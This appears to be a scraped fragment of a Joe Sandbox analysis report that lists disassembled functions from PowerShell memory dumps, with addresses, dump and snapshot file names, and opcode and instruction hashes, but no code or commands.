                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49b8c71f2706ef05dc0605fa3c536647985570c7783739308d3f813d2551d547
                                                                                            • Instruction ID: ed82d378bf8b0c629ba21ebc377bb143a71d1a8c922c60bf5c88abb6e4132268
                                                                                            • Opcode Fuzzy Hash: 49b8c71f2706ef05dc0605fa3c536647985570c7783739308d3f813d2551d547
                                                                                            • Instruction Fuzzy Hash: ED429053E0E6D21FE753566958F61F57FA0EF23265B0900F7C6D9CA0E3D90CA80AA352
                                                                                            Function 00007FFD34556151 Relevance: .2, Instructions: 236COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424224054.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34550000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57414d0121cbc5edff91a63528da1295e949698ba332d126ffe937767348a304
                                                                                            • Instruction ID: 408bb023d4a33d0fba420f058f26a0e1a22f0e73bbc8bfc1af7fe23b2ee1c4be
                                                                                            • Opcode Fuzzy Hash: 57414d0121cbc5edff91a63528da1295e949698ba332d126ffe937767348a304
                                                                                            • Instruction Fuzzy Hash: 75716487F0F6C21EE763566828F54F92FA0DF5322570902F7D6DEC60A3DD0DA406A262

                                                                                            Executed Functions

                                                                                            Function 00007FFD3461334E Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2209492221.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7ffd34610000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6689a01889d379629f197c6fb487dba2f8f686835b05f96cc75d1dea8de54cf
                                                                                            • Instruction ID: 07374f8dafb72f5fb6f9e14fa4602f55c69b3e60d40f8d4c4daa254124ab8b19
                                                                                            • Opcode Fuzzy Hash: f6689a01889d379629f197c6fb487dba2f8f686835b05f96cc75d1dea8de54cf
                                                                                            • Instruction Fuzzy Hash: F2110631B0D7C98FEB55DE9880A41B87BD2EF4A310B0400BFC54DCB183DE28A881D311
                                                                                            Function 00007FFD345433B5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2209106562.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7ffd34540000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: 5d7fcb5bbf17594a2fd62b4d39bec78ad26d850823527c364f545537ea33e4f1
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 5001677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665DB36E882CB45